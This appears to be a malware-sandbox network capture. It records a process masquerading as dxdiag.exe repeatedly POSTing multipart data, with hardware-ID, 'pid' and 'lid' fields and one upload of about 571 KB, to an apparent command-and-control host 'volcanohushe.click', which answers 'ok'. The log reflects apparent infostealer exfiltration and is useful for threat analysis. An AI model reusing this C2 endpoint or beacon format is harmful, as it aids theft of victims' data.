                                                                                                      Data Ascii: FjY8hgWcOKSQKSS1AZau2PKb5e6zGGaKaFWvaw5LuL9LMrzeIchE2CwpJZVcis/I+p78v5s4MqJkPIpONmvV9i4GFNZRvAzwmAUkjSWmgvj6u9Hiqh1DskwVrzMO7/Xydj4AshXtHJGQeBiJELPLyOqD0c6bLHqiZHTmbhJL/ZJiGiSCYaAw0LBVKK1ppuKB55b9wvodG7KIaO4SA18d5iZqFKp8gGHUzR0EpCDTqtDai/HinzhKhkRQulYWR/G
                                                                                                      2024-12-23 00:22:11 UTC1369INData Raw: 5a 34 77 75 48 6e 73 74 43 77 5a 39 43 47 2b 74 73 54 69 68 39 6e 75 70 77 42 71 2b 6e 68 6f 35 6c 59 4b 65 2b 32 4f 4b 67 59 4d 74 6b 6d 6b 4b 4e 79 63 41 51 53 70 4e 4c 4f 54 79 50 72 4f 2f 4c 2b 62 6d 45 36 65 59 52 6e 48 55 6e 4e 76 76 4c 34 32 41 7a 6e 2f 54 59 41 30 2b 49 41 70 46 4b 6b 74 2b 71 37 51 72 71 2f 4a 39 74 4d 30 56 71 5a 6b 51 4a 70 65 46 6b 2f 31 6a 6d 49 57 4f 4a 4a 67 67 53 58 73 74 48 77 5a 39 43 45 2b 39 70 44 4f 73 38 32 47 74 78 68 32 36 6d 51 31 72 32 73 4f 45 38 58 37 4b 31 4a 67 33 68 47 63 59 64 54 4e 48 51 53 6b 49 4e 4f 71 30 4d 4b 33 34 63 61 6a 56 47 36 71 62 45 69 4b 64 68 35 33 31 62 34 36 49 69 53 4b 51 62 41 77 38 4b 51 68 43 4c 45 5a 6c 70 66 4a 33 36 2f 68 76 35 70 39 65 6a 59 38 65 4a 35 6e 44 69 72 68 32 79 6f 75
                                                                                                      Data Ascii: Z4wuHnstCwZ9CG+tsTih9nupwBq+nho5lYKe+2OKgYMtkmkKNycAQSpNLOTyPrO/L+bmE6eYRnHUnNvvL42Azn/TYA0+IApFKkt+q7Qrq/J9tM0VqZkQJpeFk/1jmIWOJJggSXstHwZ9CE+9pDOs82Gtxh26mQ1r2sOE8X7K1Jg3hGcYdTNHQSkINOq0MK34cajVG6qbEiKdh531b46IiSKQbAw8KQhCLEZlpfJ36/hv5p9ejY8eJ5nDirh2you
                                                                                                      2024-12-23 00:22:11 UTC1369INData Raw: 45 64 6a 61 69 64 4e 4d 30 31 72 76 50 41 4d 71 50 46 35 6f 64 46 65 73 36 74 54 61 35 75 5a 31 61 35 57 6b 38 79 4a 4b 39 4d 34 52 79 34 74 42 30 45 2f 58 6d 75 6d 6f 7a 4b 6d 38 31 57 70 77 41 69 76 6d 78 34 36 6e 63 2b 65 2b 79 2f 45 7a 49 6b 2f 30 7a 68 48 46 43 30 52 52 51 70 4c 66 61 50 79 64 2b 76 34 59 65 61 66 58 70 4c 55 44 79 69 45 67 4a 72 6e 55 63 72 55 6c 78 6e 54 61 78 45 38 4f 67 52 51 4c 6b 56 67 75 34 78 35 38 36 73 6c 39 4a 56 4d 2f 6f 74 64 4e 4b 76 4e 31 66 63 76 30 72 57 58 5a 34 55 67 58 32 6c 6b 52 31 52 6c 45 43 7a 74 73 53 75 35 2b 58 53 77 78 46 6d 53 71 6a 6f 39 6e 6f 53 46 38 58 69 46 7a 4d 42 6e 6e 43 42 66 41 6d 6f 4f 51 54 35 5a 65 71 65 69 50 75 76 41 4f 65 62 66 58 76 54 55 4b 43 69 61 6a 5a 4c 67 66 73 65 72 6d 43 32 55
                                                                                                      Data Ascii: EdjaidNM01rvPAMqPF5odFes6tTa5uZ1a5Wk8yJK9M4Ry4tB0E/XmumozKm81WpwAivmx46nc+e+y/EzIk/0zhHFC0RRQpLfaPyd+v4YeafXpLUDyiEgJrnUcrUlxnTaxE8OgRQLkVgu4x586sl9JVM/otdNKvN1fcv0rWXZ4UgX2lkR1RlECztsSu5+XSwxFmSqjo9noSF8XiFzMBnnCBfAmoOQT5ZeqeiPuvAOebfXvTUKCiajZLgfsermC2U
                                                                                                      2024-12-23 00:22:11 UTC1369INData Raw: 73 4b 53 57 6c 47 5a 36 71 31 4b 62 33 6b 4f 36 37 45 42 4c 61 71 49 77 43 59 68 5a 4c 73 61 49 79 71 72 6d 66 64 49 41 68 37 63 6a 34 47 62 51 68 54 35 50 49 68 36 36 63 33 6b 38 51 51 6f 70 4d 4c 4f 74 6d 72 74 73 78 56 79 4b 43 4a 4d 74 46 55 41 43 73 37 44 45 73 70 43 43 4c 71 74 48 6e 7a 72 7a 6e 6d 77 77 2f 73 7a 45 31 35 7a 39 62 47 6f 54 2f 59 6b 38 41 2b 30 33 5a 48 59 33 68 4a 42 6a 63 49 4e 4f 72 31 4f 72 6e 74 63 61 58 52 48 65 75 71 49 77 79 61 68 4a 54 67 66 35 32 44 73 42 6d 47 59 77 6b 31 4c 52 46 58 5a 51 59 73 70 66 4a 68 6b 72 38 2f 35 76 68 51 37 49 78 64 63 39 53 32 6c 76 68 68 6a 5a 71 66 61 72 52 75 41 44 6f 38 46 31 45 71 43 43 4c 71 74 48 6e 7a 72 54 6e 6d 77 77 2f 73 7a 45 31 35 7a 39 62 47 6f 54 2f 59 6b 38 41 2b 30 33 5a 48 59
                                                                                                      Data Ascii: sKSWlGZ6q1Kb3kO67EBLaqIwCYhZLsaIyqrmfdIAh7cj4GbQhT5PIh66c3k8QQopMLOtmrtsxVyKCJMtFUACs7DEspCCLqtHnzrznmww/szE15z9bGoT/Yk8A+03ZHY3hJBjcINOr1OrntcaXRHeuqIwyahJTgf52DsBmGYwk1LRFXZQYspfJhkr8/5vhQ7Ixdc9S2lvhhjZqfarRuADo8F1EqCCLqtHnzrTnmww/szE15z9bGoT/Yk8A+03ZHY
                                                                                                      2024-12-23 00:22:11 UTC1369INData Raw: 71 54 79 36 4b 74 53 2b 6f 76 7a 6e 6d 79 31 37 30 31 42 77 68 68 49 36 61 38 53 4f 4e 6c 6f 6c 6e 33 53 41 4a 65 33 4a 48 52 79 39 59 59 61 57 31 64 61 33 78 65 65 62 59 55 4c 58 55 43 32 76 4d 30 4e 75 32 66 63 72 55 7a 6d 43 51 63 68 55 39 4b 52 46 46 59 6e 5a 53 68 36 41 2b 75 2f 77 31 6c 38 6f 61 75 6f 45 65 4f 35 4f 39 71 39 74 39 6a 5a 79 4e 5a 61 4a 32 42 44 73 6b 41 41 5a 72 43 48 54 71 36 6e 6d 47 37 58 43 32 78 46 37 69 31 42 46 72 7a 4d 4f 59 35 47 69 61 6a 38 49 67 69 57 64 48 4a 47 51 65 42 6a 4d 49 4e 50 6e 38 65 62 6d 2f 4c 2b 61 41 45 4b 47 56 48 69 57 58 6b 59 66 77 62 4a 79 50 79 52 6d 74 54 52 55 38 4f 67 51 45 46 45 56 6f 76 4b 63 36 75 2f 68 4a 6d 4f 6f 4d 71 34 51 65 61 62 69 45 6d 50 70 52 74 4c 75 66 49 49 4d 69 49 54 67 38 42 41
                                                                                                      Data Ascii: qTy6KtS+ovznmy1701BwhhI6a8SONloln3SAJe3JHRy9YYaW1da3xeebYULXUC2vM0Nu2fcrUzmCQchU9KRFFYnZSh6A+u/w1l8oauoEeO5O9q9t9jZyNZaJ2BDskAAZrCHTq6nmG7XC2xF7i1BFrzMOY5Giaj8IgiWdHJGQeBjMINPn8ebm/L+aAEKGVHiWXkYfwbJyPyRmtTRU8OgQEFEVovKc6u/hJmOoMq4QeabiEmPpRtLufIIMiITg8BA


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.849708104.21.71.1554437524C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 00:22:13 UTC284OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=MA0CHNK04GEMHC3RI7
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 12851
                                                                                                      Host: volcanohushe.click
                                                                                                      2024-12-23 00:22:13 UTC12851OUTData Raw: 2d 2d 4d 41 30 43 48 4e 4b 30 34 47 45 4d 48 43 33 52 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 46 39 39 36 39 34 41 34 30 33 32 45 31 38 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4d 41 30 43 48 4e 4b 30 34 47 45 4d 48 43 33 52 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 41 30 43 48 4e 4b 30 34 47 45 4d 48 43 33 52 49 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 6e 56 6a 61
                                                                                                      Data Ascii: --MA0CHNK04GEMHC3RI7Content-Disposition: form-data; name="hwid"2F99694A4032E18DAC8923850305D13E--MA0CHNK04GEMHC3RI7Content-Disposition: form-data; name="pid"2--MA0CHNK04GEMHC3RI7Content-Disposition: form-data; name="lid"pqZnKP--ZnVja
                                                                                                      2024-12-23 00:22:14 UTC1130INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 00:22:14 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=abhpjbqbf0sulmtg6qlapc9ko6; expires=Thu, 17 Apr 2025 18:08:53 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2IX9GTEtF8tSdHoDVhohM79a2E%2BTp7EPKBo66iThEwM8eIXZeAoEERpc9s4jDtHNL%2BbURiaIhCU3FiUKtzaxlHUEY7IoIJM5wz0vLIX57dCPrH1ShJ9gIxlOrUIgQJf%2FjBpQzwM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6432308bccf3bb-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1589&rtt_var=619&sent=14&recv=18&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13793&delivery_rate=1736028&cwnd=80&unsent_bytes=0&cid=27446a17c365e604&ts=998&x=0"
                                                                                                      2024-12-23 00:22:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-23 00:22:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.849709104.21.71.1554437524C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 00:22:16 UTC278OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=QYJM3V1ZQPMP
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 15044
                                                                                                      Host: volcanohushe.click
                                                                                                      2024-12-23 00:22:16 UTC15044OUTData Raw: 2d 2d 51 59 4a 4d 33 56 31 5a 51 50 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 46 39 39 36 39 34 41 34 30 33 32 45 31 38 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 51 59 4a 4d 33 56 31 5a 51 50 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 59 4a 4d 33 56 31 5a 51 50 4d 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 6e 56 6a 61 32 6c 75 5a 31 0d 0a 2d 2d 51 59 4a 4d 33 56 31 5a 51
                                                                                                      Data Ascii: --QYJM3V1ZQPMPContent-Disposition: form-data; name="hwid"2F99694A4032E18DAC8923850305D13E--QYJM3V1ZQPMPContent-Disposition: form-data; name="pid"2--QYJM3V1ZQPMPContent-Disposition: form-data; name="lid"pqZnKP--ZnVja2luZ1--QYJM3V1ZQ
                                                                                                      2024-12-23 00:22:17 UTC1130INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 00:22:16 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=r0gndtqh081t6tn6dj72k0f5v6; expires=Thu, 17 Apr 2025 18:08:55 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bldo2B%2F2oxV2eSN7FDxAIXE7Ie33S16J477JPN1Nz0tqkuNHqwLSG1iG4I5QS2K6DJOqIeID4QqbjyR5HLUo5O2To9y5f2VYQHscg4bXF3iPuvJKz3WFi9ccyAuRMRrHdxoD80o%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6432400f79de98-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1592&rtt_var=610&sent=17&recv=19&lost=0&retrans=0&sent_bytes=2842&recv_bytes=15980&delivery_rate=1834170&cwnd=212&unsent_bytes=0&cid=1fcb17ae0e9328d4&ts=1020&x=0"
                                                                                                      2024-12-23 00:22:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-23 00:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.849710104.21.71.1554437524C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 00:22:18 UTC280OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=95LDDMB43LT0XK
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 20223
                                                                                                      Host: volcanohushe.click
                                                                                                      2024-12-23 00:22:18 UTC15331OUTData Raw: 2d 2d 39 35 4c 44 44 4d 42 34 33 4c 54 30 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 46 39 39 36 39 34 41 34 30 33 32 45 31 38 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 35 4c 44 44 4d 42 34 33 4c 54 30 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 35 4c 44 44 4d 42 34 33 4c 54 30 58 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 6e 56 6a 61 32 6c 75 5a 31 0d 0a 2d 2d 39 35 4c
                                                                                                      Data Ascii: --95LDDMB43LT0XKContent-Disposition: form-data; name="hwid"2F99694A4032E18DAC8923850305D13E--95LDDMB43LT0XKContent-Disposition: form-data; name="pid"3--95LDDMB43LT0XKContent-Disposition: form-data; name="lid"pqZnKP--ZnVja2luZ1--95L
                                                                                                      2024-12-23 00:22:18 UTC4892OUTData Raw: 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                      Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                      2024-12-23 00:22:19 UTC1130INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 00:22:19 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=0l0a1mhcu92cni78ls4vu43v7s; expires=Thu, 17 Apr 2025 18:08:58 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tx%2BZsEnAEms4AKRaegBQFM5R76y6lLXWalZkMseGUJcKcN8nQiWdJqBiCf8ffYqKscRas2HR4T14exdHvRN7X7V6GyLBgJkxtfyn%2BmSWRzNpzPz5xZNIFxzLkFbJRg6a7psXFZc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f6432508fa37c6c-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1842&min_rtt=1829&rtt_var=712&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21183&delivery_rate=1509043&cwnd=189&unsent_bytes=0&cid=18349179cf40d890&ts=1229&x=0"
                                                                                                      2024-12-23 00:22:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-23 00:22:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.849712104.21.71.1554437524C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 00:22:21 UTC277OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=ZEM9UWIBZYJT
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 1208
                                                                                                      Host: volcanohushe.click
                                                                                                      2024-12-23 00:22:21 UTC1208OUTData Raw: 2d 2d 5a 45 4d 39 55 57 49 42 5a 59 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 46 39 39 36 39 34 41 34 30 33 32 45 31 38 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 5a 45 4d 39 55 57 49 42 5a 59 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 45 4d 39 55 57 49 42 5a 59 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 6e 56 6a 61 32 6c 75 5a 31 0d 0a 2d 2d 5a 45 4d 39 55 57 49 42 5a
                                                                                                      Data Ascii: --ZEM9UWIBZYJTContent-Disposition: form-data; name="hwid"2F99694A4032E18DAC8923850305D13E--ZEM9UWIBZYJTContent-Disposition: form-data; name="pid"1--ZEM9UWIBZYJTContent-Disposition: form-data; name="lid"pqZnKP--ZnVja2luZ1--ZEM9UWIBZ
                                                                                                      2024-12-23 00:22:22 UTC1126INHTTP/1.1 200 OK
                                                                                                      Date: Mon, 23 Dec 2024 00:22:21 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=esm1aa4ch5m6ere70090o72sqr; expires=Thu, 17 Apr 2025 18:09:00 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9edhK55LY2U6NoR7nzbKAoccUbahjUqjm0V31m4fiapv6pE5y0am49dRE9NAbmkjRNxmnnFnWj8scrDcyQe2OVfvIjA3ZB8p2%2FU1frKNEwVU26idM6w1%2FEv7XNEzL2XXIsDd4t8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f643260cd468c7b-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1831&rtt_var=698&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2121&delivery_rate=1554845&cwnd=186&unsent_bytes=0&cid=5132ea87e9df5207&ts=772&x=0"
                                                                                                      2024-12-23 00:22:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2024-12-23 00:22:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.849713104.21.71.1554437524C:\Windows\SysWOW64\dxdiag.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-23 00:22:23 UTC278OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=2IWMDEENI15
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 571518
                                                                                                      Host: volcanohushe.click
                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: 2d 2d 32 49 57 4d 44 45 45 4e 49 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 46 39 39 36 39 34 41 34 30 33 32 45 31 38 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 49 57 4d 44 45 45 4e 49 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 49 57 4d 44 45 45 4e 49 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 6e 56 6a 61 32 6c 75 5a 31 0d 0a 2d 2d 32 49 57 4d 44 45 45 4e 49 31 35 0d
                                                                                                      Data Ascii: --2IWMDEENI15Content-Disposition: form-data; name="hwid"2F99694A4032E18DAC8923850305D13E--2IWMDEENI15Content-Disposition: form-data; name="pid"1--2IWMDEENI15Content-Disposition: form-data; name="lid"pqZnKP--ZnVja2luZ1--2IWMDEENI15
                                                                                                      2024-12-23 00:22:23 UTC15331OUTData Raw: dc 17 ab c1 e5 98 6b a8 77 2e 3f ba e3 3b fd a7 a4 cb 6b 05 8d 48 1f d8 d3 03 51 bf 6d 9c 8e 55 1e cc 4e 48 50 d9 5b cf 5a d4 0b 3b 1d f9 70 f6 50 9b 26 84 9e f7 79 a7 02 95 37 79 c5 42 2e 28 d1 45 6a 09 82 ca 66 73 95 0a 00 5f 71 b3 c9 7a f1 d1 e1 49 75 1e 66 96 b9 f4 4b 15 7f 28 bd 6c 6f 78 d6 73 d1 54 22 53 10 41 dd 70 11 fe f5 32 cc 11 2c 57 df 3c 37 fc b3 83 95 f1 8a 3e bb ca 0b 76 93 00 d5 33 12 2c f3 2d 66 61 2d 70 5b d6 f3 a9 ab e9 f1 37 65 64 ee f5 a6 b5 b3 d6 10 82 55 d7 eb 07 5f ae d8 23 a8 ca 16 ff df c3 98 bd 58 18 19 8c 21 6b b3 a7 01 c4 bd 6a 36 1f 76 05 96 88 36 b9 79 15 33 3c 1d c7 aa 30 57 97 a5 da cf 0c e5 dd c2 e7 33 b4 f3 a6 ba 2d 40 3e 0e d3 8b 84 7b 7f 3b f5 cd 42 d4 d7 63 01 aa 99 b2 d1 fb 32 6c cb 30 92 6d a1 a4 7d 7b c5 ca 64 1f
                                                                                                      Data Ascii: kw.?;kHQmUNHP[Z;pP&y7yB.(Ejfs_qzIufK(loxsT"SAp2,W<7>v3,-fa-p[7edU_#X!kj6v6y3<0W3-@>{;Bc2l0m}{d
